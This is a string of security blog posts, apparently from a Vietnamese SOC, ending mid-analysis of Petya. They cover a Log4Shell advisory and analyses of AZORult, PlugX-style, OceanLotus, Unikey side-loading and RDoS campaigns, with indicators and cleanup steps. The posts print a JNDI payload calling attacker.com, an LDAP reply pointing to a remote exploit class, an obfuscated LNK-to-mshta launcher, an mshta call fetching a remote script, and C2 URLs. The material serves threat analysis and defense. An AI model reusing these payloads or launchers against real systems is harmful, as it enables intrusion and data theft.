Log4j2 là một thư viện mã nguồn mở dựa trên Java và thường được tích hợp trên các máy chủ web Apache với chức năng ghi lại nhật ký. Theo các nguồn tin, nhà nghiên cứu Chen Zhaojun của Alibaba đã gửi báo cáo lỗ hổng thực thi mã từ xa Log4j2 (RCE) cho Apache vào ngày 24 tháng 11 năm 2021. Lỗ hổng nghiêm trọng này sau đó đã được gán mã định danh CVE-2021-44228, hay còn được gọi là “Log4Shell”, tác động đến tất cả các phiên bản Log4j2 từ 2.0-beta9 đến 2.14.1.

Phân tích

Lỗ hổng CVE-2021-44228 cho phép kẻ tấn công bên ngoài hệ thống, không cần xác thực, có thể khai thác bằng cách gửi yêu cầu chứa mã khai thác (payload) đến máy chủ đang chạy phiên bản Log4j tồn tại lỗi. Yêu cầu được gửi đi sử dụng JNDI thông qua nhiều dịch vụ bao gồm:

  • Lightweight Directory Access Protocol (LDAP)
  • Remote Method Invocation (RMI)
  • Domain Name System (DNS)

Lỗ hổng Log4j được kích hoạt bởi payload, phía máy chủ sẽ tạo yêu cầu trên JNDI thông qua một trong các dịch vụ do kẻ tấn công kiểm soát. Khi nhận được yêu cầu này, kẻ tấn công sẽ trả về một đường dẫn đến tệp Java class được lưu trữ từ xa, tệp này sau đó sẽ được phía máy chủ chèn vào luồng xử lý và cho phép kẻ tấn công có thể thực thi mã tuỳ ý.

Cách thức khai thác

Log4j2 đã bổ sung thêm chức năng tra cứu, bao gồm cả tra cứu JNDI, nhưng tra cứu JNDI này không bị hạn chế, dẫn đến lỗ hổng bảo mật.

Java Naming and Directory Interface (JNDI) là một Java API cho phép lưu trữ và truy cập nhiều loại dữ liệu và tài nguyên, như đối tượng, tệp, thư mục… JNDI được thiết kế để cung cấp một giao diện chung cho phép truy cập các dịch vụ hiện có như DNS, LDAP, CORBA và RMI.

Trong số đó, có một loại dữ liệu có thể được trả về URI trỏ đến một Java class, và nếu hệ thống tải về và xử lý Java class không đáng tin cậy, nó có thể gây nguy hiểm cho máy chủ nếu class này có chứa mã độc.

Ban đầu, kẻ tấn công tiến hành gửi tới máy chủ mục tiêu chuỗi string chứa payload với điều kiện payload được ghi log lại trên hệ thống (trong trường hợp này, kẻ tấn công sẽ xây dựng một JNDI và chèn vào HTTP Header):

User-Agent: ${jndi:ldap://attacker.com:port/path}

Máy chủ mục tiêu khi parse chuỗi payload trên, Log4j instance sẽ khởi tạo một yêu cầu LDAP thông qua JNDI tới URL endpoint mà kẻ tấn công kiểm soát. Máy chủ LDAP, cũng do kẻ tấn công kiểm soát, sẽ phản hồi lại thông tin dẫn tới một endpoint file Java .class từ xa do kẻ tấn công tạo ra, chứa mã thực thi:

dn:
javaClassName: <class name>
javaCodeBase: http://second-stage.attacker.com/exploit.class
objectClass: javaNamingReference
javaFactory: <file base>

Cuối cùng, quá trình phía máy chủ mục tiêu xử lý, Java class được tải vào bộ nhớ và được thực thi bởi Log4j, đồng thời thực thi mã độc được cài đặt trong Java class đó.

Nguồn: fastly.com

 

Mô phỏng cách thức tấn công được dựng tại đây: https://github.com/christophetd/log4shell-vulnerable-app

Mức độ nguy hiểm

Do tính phổ biến của thư viện Log4j2, rất nhiều hệ thống đã và đang chịu ảnh hưởng từ lỗ hổng CVE-2021-44228 Log4Shell, bao gồm cả những hệ thống, dịch vụ đám mây của Steam, Cloudflare, Twitter, Tesla… Kèm theo rất nhiều mã khai thác công khai được cập nhật trên Github. Hiện tại, lỗ hổng này đang được hacker khai thác rất tích cực.

Mã khai thác công khai CVE-2021-44228 trên Github
Khai thác CVE-2021-44228 trên Minecraft

Cách khắc phục

Thực hiện khắc phục lỗ hổng

Hiện tại đã có bản vá cho CVE-2021-44228 Log4J RCE, khuyến nghị cập nhật sớm nhất để tránh bị ảnh hưởng: Log4j’s lastest release v2.15.0.

Lỗ hổng này có thể được giảm thiểu trên các phiên bản release trước đây (>=2.10):

  • Setting “log4j2.formatMsgNoLookups” thành “true” hoặc:
  • xoá class JndiLookup khỏi classpath 

(Ví dụ: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Bên cạnh đó, sử dụng Java 8u121 chống lại lỗ hổng RCE bằng cách cấu hình “com.sun.jndi.rmi.object.trustURLCodebase” và “com.sun.jndi.cosnaming.object.trustURLCodebase” thành “false.”

Sử dụng WAF

Thiết lập giám sát sử dụng WAF để bảo vệ ứng dụng bằng cách phát hiện những request có chứa chuỗi khai thác Log4j, chuỗi khai thác này có thể được chèn vào bất kỳ vị trí nào trên một HTTP request, thực hiện chặn request đó, ngăn không cho ứng dựng xử lý chuỗi khai thác.

HTTP Request Action
Log4j Headers BLOCK
Log4j Body BLOCK
Log4j URL BLOCK

Hoặc kích hoạt WAF từ các nhà cung cấp dịch vụ đám mây như Google Cloud, Cloudflare hay Amazon AWS

Một điều cuối cùng cần lưu ý đó là phiên bản Log4J v1 đã không còn được hỗ trợ và vẫn có thể dính lỗ hổng CVE-2021-44228 Log4J RCE, vì thế hãy nâng cấp lên phiên bản Log4j’s lastest release v2.15.0 sớm nhất.


Xem thêm & quote:

Digging deeper into Log4Shell – 0Day RCE exploit found in Log4j | Fastly

Inside the log4j2 vulnerability (CVE-2021-44228) (cloudflare.com)

Actual CVE-2021-44228 payloads captured in the wild (cloudflare.com)

By DatMom

Taking advantage of the plague of the Covid-19 epidemic, hackers have attacked the need to capture information from people around the world to spread malware. The attacker tricked the user into downloading and running a malware whose interface was downloaded from a legitimate source but ran in the background.

The malware was identified as AZORult, a malware discovered in 2016, that collects web browser data such as cookies, browsing history, user id, passwords and even encryption keys.

In-depth analysis

Sample Corona-virus-Map.com.exe

Hash: 73da2c02c6f8bfd4662dc84820dcd983

File Type: Portable Executable 32

File Info: Microsoft Visual C ++ 8, Autoit

The attacker will trick the user into downloading a file called "Corona-virus-Map.com.exe". This file is written in Autoit so we can easily decompile and get the source code of the malicious code.

The script shows that it will create a folder at "%APPDATA% / Z11062600" and install two files, "Corona.exe", "Corona-virus-Map.com.exe" and then launch the two files.

Sample Corona-virus-Map.com.exe

Hash: 07b819b4d602635365e361b96749ac3e

File Type: Portable Executable 32

File Info: Microsoft Visual Studio .NET

The file "Corona-virus-Map.com.exe" is dropped onto the user's computer as a .Net file, through decompression and analysis. The main function of this file is to retrieve data from "hxxps: // gisanddata [.] Maps.arcgis [.] Com / apps / opsdashboard / index [.] Html# / bda7594740fd40299423467b48e9ecf6" to display to the user interface map of Covid-19 infection to gain trust that users do not suspect.

Sample Corona.exe

Hash: 1beba1640f5573cbac5552ae02c38f33

File Type: Portable Executable 32

File Info: Rar archive

File "Corona.exe" when launched will create two files, one is Corona.bat, the other is Corona.sfx.exe. In particular, the bat file has the following content:

@echo off
Corona.sfx.exe -p3D2oetdNuZUqQHPJmcMDDHYoqkyNVsFk9r -dC: \ Windows \ System32

The process of "Corona.exe" file will use cmd to run the file "Corona.bat" and from there launch "Corona.sfx.exe". This "Corona.sfx.exe" file will create and run another Corona.exe file that has the same function as the first Corona.exe file to create and launch the next two files, bin.exe and Build.exe in folder "%APPDATA% / Z58538177". To make it easier to imagine, we have the process graph as follows:

Sample bin.exe

Hash: c4852ee6589252c601bc2922a35dd7da

File Type: Portable Executable 32

File Info: Borland Delphi

This is the main executable file of the malicious code. Identified by security vendors as AZORult, a type of malware that steals data. Once on the computer, the malware victim will get all the identification information such as Guid, version information, username, computername and create a separate guid:

From the guid just created, the malware is used to mutex to prevent two malware programs from running at the same time.

The malware re-encodes the identity information and immediately decrypts the C&C address

The malicious code connects to the C&C server along with the identity information of the victim machine and the server returns large amounts of data

After the malicious code decodes the downloaded data, we can see that they download a list of dynamic libraries to the victim machine and write to the folder "%TEMPda"

The malware lists a lengthy list of links from which we can determine where the malicious code is targeted. They hijack the data of browsers such as Firefox, Chrome, Chronium, Brave, Edge, Comodo, Kometa, Cococ, Opera, 360, ... email clients such as Outlook, Thunderbird, ... and many more. The libraries are downloaded to provide the necessary functions so that an attacker can read the data.

For example, malware will query Outlook profile data in the registry

Or steal the password to access the firezilla server

 

Even the victim's virtual currency is touched

Finally, the malware sends the captured data and encrypts them and sends them back to the C&C server. Malware runs the command to delete files.

C: \\ Windows \\ system32 \\ timeout.exe 3 & del \ ”bin.exe \

Sample Build.exe

Hash: F6A5E02F46D761D3890DEBD8F2084D37 File Type: Portable Executable 32 File Info: UPX v3.0, Autoit

There are many tools that can help you unpack UPX such as CFF Explorer. This file, when executed, will make a copy to the folder "%APPDATA% / amd64_netfx4-system.runti..dowsruntime.ui.xaml.Globalization.Fontgroups.exe" and run. Just like the first dropper of malicious code, we only need to decompile the Autoit file to get the source code

We save a lot of time when this malicious code sample is not obfuscated too complicated. Through the process of analyzing and searching information, we can conclude that the main activity of the sample is to steal information from browser cookies, steal encryption keys, disable proxy configuration, change properties of file for anonymity.

IOC

Hash

  • MD5: 73da2c02c6f8bfd4662dc84820dcd983
  • MD5: 07b819b4d602635365e361b96749ac3e
  • MD5: 1beba1640f5573cbac5552ae02c38f33
  • MD5: c4852ee6589252c601bc2922a35dd7da
  • MD5: F6A5E02F46D761D3890DEBD8F2084D37
  • MD5: e9dcbecca02b600ce135f7d58b8cd830
  • MD5: 3cb9fc1ee05f49438455ba1aea3bca4e

Domain

  • coronavirusstatus [.] space

Cleaning steps

  • Find the above md5 files in directories:
    • %APPDATA% / Z11062600
    • %APPDATA% / Z58538177
    • %APPDATA% / amd64_netfx4-system.runti..dowsruntime.ui.xaml
  • End all processes of the above files (if any)
  • Delete all files above (if any and if the hash code is correct)
  • Delete task scheduler link to file Windows.Globalization.Fontgroups.exe> Also can use software of trusted antivirus vendors to handle

Conclude

The severity of the Covid-19 epidemic is undisputed. Bad guys are taking full advantage of the coronavirus-related information on the web and many may become prey to attacks. Users need to calmly protect themselves against biological viruses and computer viruses. > For a safe translation situation map, users should visit the website https://coronavirus.jhu.edu/map.html of Johns Hopkins University

MustangPanda – COVID 19 Malware
07 Mar

I / Introduction

Recently, due to the complicated development of COVID 19, many hacker groups took advantage of this to conduct APT campaigns aimed at organizations around the world, as well as appear campaigns in Vietnam.

Recently taking advantage of the stressful situation of the COVID-19 influenza, the malicious code similar to those developed by the Panda hacker group was found to impersonate three government notices about the outbreak. to deceive users. The malware was injected in a word file with the title: "Chi Thi thuong nguyen xuuc phuc" to deceive users, this code is currently collected by us through the CMC Threat Intelligence system.

Through this malicious pattern Threat Intelligence system is involved with some of the recent samples that we have warnings about.

CMC WARNING NEW APT CAMPAIGN ADVANTAGES UNIKEY ATTACKING USERS IN VIETNAM

CMC CYBER SECURITY ANALYSIS OF LNK MALWARE FORM OF APT PANDA GROUP

 

II / Detail

FILE LNK

The sample file is a shortcut file with the extension ".lnk" hidden as a winword file to deceive users because the ".lnk" extension will be hidden by Windows. However, this winword file uses a suspicious target. Normally the shortcut target target usually points to a destination folder or file, but the target of this template contains the command with the form:

%comspec% / c for %x in (%temp% = %) do for / f "delims ==" %i in ('dir "%x \ Chi Thi thuong nguyen xuan phuc.lnk" / s / b'wind) start m%wind -1,1%hta.exe "%i"

The above code was obfuscate using the variable %comspec% instead of directly calling the string "cmd.exe" and the "s" in the file name mshta.exe was obtained by cutting the last character in the variable "%windir%" (usually C: \ Windows). Mshta.exe is a microsoft application developed to take advantage of fast application building through html, css, vbscript, javascript. Using mshta and the .hta file format, you can open an html page as an application. The hta file format is the same as the html file. By adding a tag inside the html file we have the hta file that can be opened via the mshta application.

However, the hta file may be inserted before its header. Taking advantage of this, the attacker pre-inserted an lnk file with the command to open itself with mshta.exe to execute the embedded .hta file. When the user opens the lnk file, will execute the command in the target of the lnk file and execute the msha.exe file to open itself.

FILE HTA

By default, mshta.exe can execute both javascript and vbscript embedded in hta files using related dlls. The hta file that is embedded when opened will have the following properties: minimize, not shown on the taskbar, no menu and caption. Its sole task is to execute malicious vbscript code.

When vbscipt is executed, this script decodes and stores into %TEMP% folder 3 binary files in base64 and 1 document file.

The document file is then opened for the user.

When this attack uses PLUGX RAT will be executed:

3.exe file is actually a clean file, but when executed it will load up a malicious dll file

To do this, the attacker only needs to find a dll loaded by the LoadLibrary function in the 3.exe file (in this case http_dll.dll), then create a malicious dll file with the same name as the parameter of the LoadLibrary function. and put it in the same directory as the 3.exe file. When calling LoadLibrary, 3.exe will find the dll in the same directory first and load it up.

When "http_dll.dll" is loaded, it will redirect the execution of the PE file to a function in the DLL by changing the memory property on the memory of the PE file via the VirtualProtect API and replacing the code with a pair of push commands. , ret.

At the function of malicious DLL will read file http_dll.dat in the same directory. The content at the beginning of this dat file is a string with null-terminated and data. This string will be used to be the decryption key for the data portion of the dat file.

After that, the malicious code will create a new memory area to contain the decryption process conducted by the xor algorithm with the string key in the dat file as above. The malware continues to change the properties of this new device with the PAGE_EXECUTE_READWRITE property and execute shellcode at this address.

The decoded content is a RAW PE file, but it has been cleverly integrated into a shellcode, starting from offset 0. This shellcode serves as a loader, load this raw PE file to be able to execute OK.

First, shellcode finds the address of kernel32.dll and then fetches the functions LoadLibray, GetProcAddress, ZwFlushIntructionCache, VirtualAlloc by comparing the hash of the names of the functions that are exported by kernel32.

Then, Loader reads the header of the PE file, maps the sections to the corresponding memory areas, reallocates some addresses and resolves the Import Address Table of the file. Once completed, the program execution flow will be passed to the DllMain function of this PE file.

Final Payload

Here, the malicious code will take a number of paths to use, then decrypt a data section to use.

The decoding result is a number of strings including autorun key name, ip c & c server. The malicious code then proceeds:

  • Make a copy of the three executable files to the user's profile directory or alluserprofile if there are sufficient administrator rights.
  • Add and lock autorun to activate the executable file which has just been dropped when restarting the computer. Also relaunch itself if this is its first run. The malware distinguishes this by inserting another parameter to it at subsequent runs.
  • Create a mutex, connect to the server to receive commands from the server.
  • Creating a backdoor allows an attacker to execute commands remotely.
  • Support many different commands including upload file, folder, list folder, read file, get computer information, user, ...

3. Conclusion

By using various attack and disruptive techniques during execution, it is shown that the person behind the malware development has invested a lot of time in researching the target and developing the attack method accordingly. . APT is a malicious attack, carefully invested to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new precautions and ongoing monitoring to ensure the security of users and organizations as well.

HASH

SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2

MD5: 60C89B54029442C5E131F01FF08F84C9

SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C: \ Users \ admin \ AppData \ Local \ Temp \ 3.exe:

C3159D4F85CEB84C4A0F7EA9208928E729A30DDDA4FEAD7EC6257C7DD1984763

C: \ Users \ admin \ AppData \ Local \ Temp \ http_dll.dll:

79375C0C05243354F8BA2735BCD086DC8B53AF709D87DA02F9206685095BB035

C2

DOMAIN vietnam.zing.photos

IP 104.160.44.85

By ManhChich - UraSec Team - CMC SOC Center

Tình hình tấn công của nhóm Oceanlotus định danh xuất phát từ Việt Nam tại Trung Quốc
18 Dec

In the first half of 2019, according to Tencent's cybersecurity intelligence center, the OceanLotus group made a public announcement. The targets of this organization are diverse, including government agencies, maritime authorities, diplomatic agencies, large state-owned enterprises, scientific research organizations and a number of private enterprises. China's big.

Through tracking, Tencent discovered that a large number of domestic targets were attacked by this group and that the entire intranet of the target was occupied, able to identify a large amount of confidential information and information. Stolen server configuration. The attackers appear to be very familiar with China as well as understanding China's hot questions and government structure. For example, when a tax reform was just launched, a tax reform plan was immediately used as the subject of an attack.

Sea Lotus (OceanLotus), also known as APT32, is a cyber attack organization identified by many organizations as coming from Vietnam. Since its inception, the group has carried out attacks on China, as well as many other countries around the world.

The attack methods have not changed much from the first detection, but there are some small improvements including attack decoys, payloads, bypassing of security layers ... etc. still in use. After gaining control of the machine, an attacker will scan the entire network. This also shows that APT attacks will not stop until it reaches its goal. As long as the target is valid, the attack will get stronger.

Characteristics of the attack

Attack by phishing email

Sea Lotus through sending fake emails about reputable organizations, users are easily fooled into downloading malicious files themselves. Throughout 2019, lots of phishing emails were sent, such as the following:

The accounts used to send phishing emails are usually NetEase's mailbox. Types of hacked accounts are usually: Sun ** @ 126 [.] Com, Yang ** @ 163 [.] Com, insert ** @ 126 [.] Com ...

Diversify types of decoys
The team used to diversify the bait for the attack and almost all the bait was used. In addition to the malicious Ink, doc, and compressed files of WinRAR ACE (CVE-2018-20250) are mentioned in many reports.

Malicious file as doc:

Decode Chm file

Winrar flaw (CVE-2018-20250)

Various ways to download files
Due to the variety of decoys for phishing, the method of downloading malicious files also varies.

 Direct execution

The executable file is disguised as a DOCX File, with the icon of microsoft word, used to trick users into downloading it. After the user has downloaded DOC file and opened it. After the File opens, the information in the document file is disturbed, enticing the victim to activate the macro code in the document file so that the content within the document can be viewed. In fact, after macros are enabled, normal content is still not displayed

Use Rundll32 to download malicious dll
After executing the malicious code, it will call and execute the actual malicious code {1888B763-A56C-4D4B-895C-2092993ECCBA} in the C: \ User \ Administrator \ AppData \ Local \ Microsoft folder, following That uses Rundll32 to execute the dll:

"C: \ Windows \ system32 \ rundll32.exe" "C: \ Users \ ADMINI ~ 1 \ AppData \ Local \ Microsoft \ {1888B763-A56C-4D4B-895C-2092993ECCBA} .dll", Register
Macro
Using a Macro to execute and obfuscated Macro code:

Office memory executes malicious shellcode
By Macro code, decode shellcode directly in Office and create a thread to execute in memory:

Use the DLL
Using DLL (Side-Loading) DLL technique to execute, download malicious files:


 Enforcement

Register a malicious DLL as a system component to execute:

Embed command file
Chm file will execute, it prompts to execute ActiveX code:

Script content of file:

However, due to encryption issues, chm is truncated after opening:

 

After decompression, the original content is as follows:

Continuous attacks use scheduled tasks
After chm is executed, the bcdsrv.dll file will be released under %AppData% \ Roaming and then a scheduled task called WeeklyMaintenance will be created:

Execution command:

C: \ Windows \ System32 \ msiexec.exe -Y

C: \ Users \ Administrator \ AppData \ Roaming \ bcdsrv.dll

Bcdsrv.dll is a really malicious file.

Ink called mstah to make

Detailed analysis of Ink technique called mstah

Once executed, the command is called:

C: \ Windows \ SysWOW64 \ mshta.exe http://api.baidu-json.com/feed/news.html

And new.html is actually a Vbs file that is a file containing executable code.

Use odbcconf.exe to download the file
Odbcconf.exe is a file included with the system. This file can be used to execute the dll file and because the server process is a system file, it may get rid of some security software:

WinRAR ACE vulnerability (CVE-2018-20250)
The compression package with this vulnerability can be structured as follows: In addition to extracting the normal files after decompression, the startup folder (C: \ Users \ Administrator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) publishes a self-extracting file:

This file is a self-extracting program. On startup, it will issue the file {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx, then issue the command:

regsvr32 / s / i {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx

Multi-load attack
In the latest attack, Sea Lotus used a Multi-load attack. In previous attacks, after decoding the shellcode, the RAT was finally executed directly, such as:

We found that after decoding the shellcode, the shellcode is downloaded and executed first. If the download fails, the pre-installed RAT is loaded:

This makes attack activities richer and more diverse and also controllable.

The circumvention of security software
Sea Lotus also uses a variety of methods to combat security software, mainly:

Use the DLL to execute
Use the executable system file
Can refer to as odbcconf.exe.

Execute shellcode directly in the office
Add junk data to the file to expand the size.
To prevent files from being collected by security vendors, Sea Lotus has intentionally added a large amount of junk data to the resources of certain files to expand the file size.

If a file is full of junk data, the file size is up to 61.4 MB (64,480,256 bytes):

Create a backdoor
The backdoor file is encrypted and customized according to the computer's properties. Therefore, the hash file on each machine is different and cannot be done without information regarding the machine that contains the backdoor. Even if the malware is found by security vendors, as long as there is no data related to the malicious computer, the payload cannot be decoded.

Disguise for CnC connection
According to configuration information, various connections and camouflage can be made, and C2 is assembled and analyzed. CnCs are usually structured (xxx is the C2 configuration):

{rand} .xxx

www6.xxx

cdn.xxx api.xxx

Fake HTTP Headers:

Custom backdoor
One of the most impressive techniques used by Sea Lotus was in 2019 (mostly backdoor use in phase 2). This technique has been recently published with malicious files released by each victim machine encrypted using the relevant computer properties (such as the hostname) of the victim and executed. We need part of this information, otherwise we can't decode it.

Therefore, each malicious file released is different and even if it is found by the security provider, as long as there is no victim's related data, the actual payload cannot be decoded.

The backdoor is also executed regarding files and processes including: AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll and links Other combinations to execute.

The encoding process is:

Through the example below can see, the username was used for encryption.

The victim username is Cao **. It can be seen that the Trojan was created specifically to infect this computer.

Malware
Through the monitoring process, it was noticed that Sea Lotus often used three main types of malware: CobaltStrike's beacon Trojan, modified Trojan Denis and Ghost family. In which CobaltStrike's beacon Trojan and the family Denis Denis are most often discovered, Ghost rarely used.

CobaltStrike:

Denis:

Ghost is modified:

Hacking the network
After a server has been infected with malware via Email Phishing, Sea Lotus will continue its attacks on internal machines. They conduct scans, searches, attacks on internal machines in as many ways as possible.

Get the hash:

Package file:

There will also be tasks created scheduled to download the tools continuously through Powershell:

The malicious file was detected as goopdate.dll.

Some other activities

During the tracking process, several similar attacks were found as Sea Lotus attacks such as:

The malicious code was eventually executed by two file types:

Beacon payload created by CobaltStrike.
The remaining payload block numverse_http is used by metasploit.
In addition, the CnC of these attacks is often detected in China:

Although there have been recent attacks similar to the actions of Sea Lotus, there are also behaviors that are not the same as that of the SeaLotus.

Summary of Sea Lotus
Sea Lotus is one of the most active APT groups in recent years, regularly attacking areas in China and countries around the world. Many cybersecurity companies have consistently made reports about recent Sea Lotus attacks. This group of Sea Lotus is currently showing no signs of stopping, they are constantly updating attack technologies and techniques, causing a lot of difficulties for security activities. Therefore, users need to increase security awareness, not arbitrarily executing attachments of unknown emails and not be fooled by phishing messages.

Safety recommendations

  • To raise awareness about security, do not open attachments of unknown emails, unless the source is reliable and the purpose is clear, it is not easy to activate Office macros.
  • Install patches and operating system patches for important software such as Office in a timely manner.
  • Use Antivirus software to prevent possible attacks like a Trojan horse.
  • Users and businesses should deploy an early threat detection system like SOC. The SOC system is currently the first choice of security houses.
    The related IOC 

MITRE ATT & CK

Source: mp.weixin.qq.com

RDoS ATTACKS BY FAKE FANCY BEAR
05 Dec

Recently, on Threat Intelligence collected some information about ransom denial-of-service (Ransom denial-of-service) attacks, the attacker asked for ransom for the victims to not be attack.

Those attackers extorted money from bullies by sending emails threatening the victims. Most attackers take the group's name  Fancy Bear to take the reputation of this group to threaten the victims with fear. Attackers posing as the infamous Fancy Bear threatened to launch a DDoS attack if the ransom was not paid. In some cases, attackers have made small DDoS attacks to prove their capabilities and validate threats. The attacks are also confirmed by other security researchers.

In the same phase, CMC Cyber Security received support requests from an organization when they received the same threatening email

 

Some organizations that received this threat email also had a demo DDoS attack on their servers.

Vector attack (floods) uses protocols UDP and ICMP , especially the attacker was using UDP / 3283, this is a newly discovered attack vector on 06/2019.

Port UDP / 3283 is used by the protocol Apple Remote Desktop Application (ARD) and ARMS service.

Fancy Bear, also known as APT28 (Sednit group, Sofacy, Pawn Storm, Strontium, Tsar Team, TG-4127, Group-4127, TAG_0700, Swallowtail, Iron Twilight, Group 74) has been operating since 2004, Fancy Bear is an organization hackers specialize in attacking large organizations and governments with APT campaigns.

Can confirm is the group Fancy Bear has nothing to do with ransom denial-of-service (RDO) campaigns, their goal is mostly to crack and spy, while their target is to spend money on something Fancy Bear sponsored, just a bit of a threat to using social engineering.

The source ip is used by the attacker to use random for UDP Flood during the attack RDoS

CMC Cyber Security will only be partially public, if you want more please contact the details.

There are many methods to mitigate this type of DDOS attacks and it is not too difficult to implement. We will continue to apdate the specific details as soon as possible.

CMC CẢNH BÁO CHIẾN DỊCH APT MỚI LỢI DỤNG UNIKEY TẤN CÔNG NGƯỜI DÙNG VIỆT NAM
03 Dec

 

General information

MD5: 08e71118bad94617bf25a0d42db6a564

Filename: KBDUS.dll

The CMD CMDD monitoring system detected malicious code that took advantage of Unikey software to attack Vietnamese users. Unikey is Vietnamese typing software for Windows very popular in Vietnam. Taking advantage of this, an attacker could create unikey installers using the official UnikeyNT.exe file but insert it in the same malicious directory. and use many techniques to trick users into running (exploit, phishing ...). Therefore users should only download the official version of unikey from the website unikey.org nor open strange files with strange paths. Also update the vulnerability patches for Windows.

 

 

Technical analysis

In the case below, the file kbdus.dll (PE 32bit) containing malicious code has been inserted in the same directory as UnikeyNT.exe (version 4.0 RC2 Build 091101 NT). The attacker also changed the time attribute of the kbdus.dll file to the time of the UnikeyNT.exe file so that people could easily deceive the user. In fact, this file was compiled at the beginning of October 2019.

 

Kbdus.dll

kbdus.dll is a library that will be loaded when the user uses the US keyboard layout (id 0x00000409). The attacker did an analysis of how Unikey works and realized when UnikeyNT.exe loaded the attached dll, UKhook40.dll, that would execute the LoadKeyboardLayoutA function to load the layout with id 0x00000409. Kbdus.dll will then load up. Because kbdus.dll is placed in the same directory as UnikeyNT.exe, this file will be loaded first, so it will execute malicious code contained in it.

At the DLL's DllMain function, the malicious code has created a new thread to execute its malicious behavior.

The malware created a mutex with the name "Global \ mFNXzY0g" to avoid overlapping execution. Malicious strings that are mostly used have been obfuscated with their own stackstring or encryption functions. The coding function here is simply set by adding the value of each character by 1 (for example, a hex "K" with a value of 0x4b will be encoded into 0x4c with the letter "L"). ). On ida pro you can use idapython to patch these characters. For stackstring, you can use ironstring.py's script flare-teamto simplify the analysis.

After creating and testing the mutex, the malicious code proceeds to read data from special registry keys. Most likely these keys are generated when the user executes an installation file prepared by the attacker. The first is the value "CB5JQLWSYQP2CWVRMJ8NB4CCUE1B8K4A" in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler". This value will contain an envelope structure and xlm data. The information in the structure includes a number of values that the malware can check after decoding the data, such as the size of the xlm data before and after, the md5 data before and after it.

The decoded data is in xlm format, which will be maliciously read into a memory area via api in the xmllite.dll library.

The next value in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler" is read as "F430D64D98E6EAC972380D568F080E08". It contains another data structure that also includes size and md5 information about the data in it. Based on this struct, the malicious code will decrypt to a different PE file with the decrypt method and check similar to the process of processing xml data.

This PE file is a dll named Knocker.dll and exported to the function named Construct, whose compile time is almost the same as the above kbdus.dll file. The malicious code loads the DLL into memory. Then the malicious code finds the address of the Construct function and executes it with the parameter is the address of the previously read data structure xml data.

Through APIs like VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, the PE file has been mapped to memory as a regular PE file. Before executing the Construct function, the malicious code also executes through the DllMain function in the dll to ensure the dll works properly.

 

Knocker.dll - Construct

At construct, the malicious code copies the data received from the parameter into another memory area, then begins collecting information about the user's computer. Information collected includes CPU, RAM, Windows information, computer name, organization, user information, language, timezone, network card, partition drive information and operating system installation.

The malware then generated a UUID in the key "HKEY_CLASS_ROOT.kci \ PersistenHandler". save 2 md5 values. The first value is generated from information about the user sid, username, and computer name. The second md5 information is based on cpu, ram, disk, network adapter values.

The malware continues to create a string to identify computers with the form "PC: %s; MAC: %s; SerVer: %f ”. This data will be in a struct that malicious code will encode in base64 form to send using GET method.

The request information sent to C&C has the form:

"Hxxp: //news.vnxahoi [.] Com: 443 / 4BwhFJ9p / job.php? [UUID] [data \ _in \ _base64]"

With user agent:

"Mozilla / 4.0 (compatible; MSIE 8.0; Win32)"

The enclosed header is:

"Content-Length: %d \ r \ nCache-Control: no-cache \ r \ nMD5: %s \ r \ nConnection: Close \ r \ n"

On the first connection, malicious code waits to receive a command to execute. And the second connection will be sent similar to the first with the purpose of reporting the execution of the command but using the POST and request methods to change with the format:

"Hxxp: //news.vnxahoi [.] Com: 443 / 4BwhFJ9p / job.php? [UUID] [create \ _process \ _sate]".

This is the final step in the execution of the malware. However, at the present time, the response is a 404 Not Found so the malicious code cannot continue to perform its other behaviors.

 

Information about c & c

Tested some information about the domain of c & c know the ip that this domain points to is 125 [.] 212.218.121.

Some other domains pointing to this ip are:

Assess the level of danger

This is an attack campaign that is well researched, very dangerous and hard to detect. Because unikey is a very popular text input method in Vietnam, it can be said that every Windows computer in Vietnam has Unikey installed. Attackers only need to drop the kbdus.dll file into the unikey folder to be able to exploit the victim's machine. It is recommended that users should carefully check the Unikey installation directory, remove the kbdus.dll file or use anti-malware products to protect their computers. CMDD of CMC has updated the malicious code kbdus.dll, users can download it at the following link: https://cmccybersecurity.com/cmc-antivirus-free/

PHÂN TÍCH MẪU RANSOMWARE PETYA
08 Nov

Ransomware Petya

Rising from the wannacry's ashes, a new peril began: Petya. In 2016 and 2017, Petya ransomware and its variants affected thousands of computers worldwide. Immediately after the Wannacry ransomware showed signs of subsiding, Petya emerged as a perfect replacement.

The special feature of this malware is that it does not encrypt the user's data files, but changes the Master Boot Record (MBR) and the Master File Table (MFT) encryption so that users cannot even boot into the system. operating.

How Petya works - Source: Microsoft.com

According to sources, the Petya ransomware attack originated from MEDoc, a Ukrainian-based audit company, through MEDoc's software containing Petya in an update. In addition, Petya is also inserted in the text file intentionally sent to the organization when the user opens it, the ransomware will trick the user into activating the marco available in versions of Office.

Stage 1: High level

There are many variations of Petya ransomware on the cyber network, but in this article we will focus on sample analysis:

SHA-256: 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739

It's easy to recognize that ransomware samples need to be unpacked before executing real commands. In the debug ransomware process, there are calls to functions like VirtualProtect and VirtualAlloc to allocate and change the rights of a new device. The guess is that this will be the actual memory area of the ransomware after unpacking. So we just need to set a breakpoint at the beginning of the newly created memory and this is the result:

As we can see in the picture above, in the hexdump window is the header of a pe file. Dump the entire section and get a Setup.dll file with full import table that is easy to read.

Go through the functions performed in the Setup.dll file in turn when launched. First, Petya ransomware retrieves victim's hard drive information with DeviceIoControl function to retrieve the physical location of a volume on the hard drive, information about the type, size, and volume of the hard drive partition (by IOCTL_DISK_GET_PARTITION_INFO_EX, PARTITION_INFORMATION_EX) ,). Here is the pseudocode function that takes the physical position of a volume on one or more hard drives:

v1 = this;
  BytesReturned = 0;
  v2 = GetSystemDirectoryA(0, 0);
  v3 = v2;
  if ( !v2 )
    return 0;
